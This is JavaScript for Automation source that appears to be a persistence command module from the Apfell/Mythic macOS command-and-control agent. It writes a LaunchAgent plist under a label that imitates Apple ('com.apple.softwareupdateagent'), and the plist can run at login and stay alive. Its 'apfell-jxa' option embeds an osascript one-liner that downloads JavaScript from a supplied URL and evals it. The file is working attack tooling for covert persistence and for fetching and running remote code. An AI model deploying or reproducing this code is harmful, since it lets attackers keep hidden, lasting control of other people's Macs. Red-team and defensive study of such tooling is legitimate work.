exports.persist_launch = function(task, command, params){
    try{
        var config = JSON.parse(params);
        var template = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                "<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n" +
                "<plist version=\"1.0\">\n" +
                "<dict>\n" +
                "<key>Label</key>\n";
        var label = "com.apple.softwareupdateagent";
        if(config.hasOwnProperty('label') && config['label'] != ""){label = config['label'];}
        template += "<string>" + label + "</string>\n";
        template += "<key>ProgramArguments</key><array>\n";
        if(config.hasOwnProperty('args') && config['args'].length > 0){
            if(config['args'][0] == "apfell-jxa"){
                // we'll add in an apfell-jxa one liner to run
                template += "<string>/usr/bin/osascript</string>\n" +
                "<string>-l</string>\n" +
                "<string>JavaScript</string>\n" +
                "<string>-e</string>\n" +
                "<string>eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('" +
                config['args'][1] + "')),$.NSUTF8StringEncoding)))</string>\n"
            }
            else{
                for(var i = 0; i < config['args'].length; i++){
                    template += "<string>" + config['args'][i] + "</string>\n";
                }
            }
        }
        else{
            return "Program args needs values or \"apfell-jxa\"";
        }
        template += "</array>\n";
        if(config.hasOwnProperty('KeepAlive') && config['KeepAlive'] == true){ template += "<key>KeepAlive</key>\n<true/>\n"; }
        if(config.hasOwnProperty('RunAtLoad') && config['RunAtLoad'] == true){ template += "<key>RunAtLoad</key>\n<true/>\n"; }
        template += "</dict>\n</plist>\n"
        // now we need to actually write out the plist to disk
        var response = "";
        if(config.hasOwnProperty('LocalAgent') && config['LocalAgent'] == true){
            var path = "~/Library/LaunchAgents/";
            path = $(path).stringByExpandingTildeInPath;
            var fileManager = $.NSFileManager.defaultManager;
            if(!fileManager.fileExistsAtPath(path)){
                $.fileManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $());
            }
            var path = $(path.js + "/" + label + ".plist");
            response = write_data_to_file(template, path);
        }
        else if(config.hasOwnProperty('LaunchPath') && config['LaunchPath'] != ""){
            response = write_data_to_file(template, $(config['LaunchPath']));
        }

        return response;
    }catch(error){
        return error.toString();
    }
};
COMMAND_ENDS_HERE